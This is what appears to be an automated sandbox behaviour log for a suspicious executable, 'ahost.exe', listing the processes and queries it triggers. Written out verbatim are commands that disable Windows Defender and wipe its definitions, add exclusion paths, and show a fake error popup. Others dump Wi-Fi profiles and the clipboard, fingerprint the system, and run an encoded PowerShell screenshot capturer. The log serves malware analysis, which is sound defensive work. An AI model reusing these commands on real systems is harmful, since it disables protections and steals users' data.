              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
              Source: C:\Users\user\Desktop\ahost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72722Jump to behavior
              Source: ahost.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\ahost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: ahost.exeReversingLabs: Detection: 36%
              Source: ahost.exeString found in binary or memory: set-addPolicy
              Source: ahost.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\ahost.exeFile read: C:\Users\user\Desktop\ahost.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
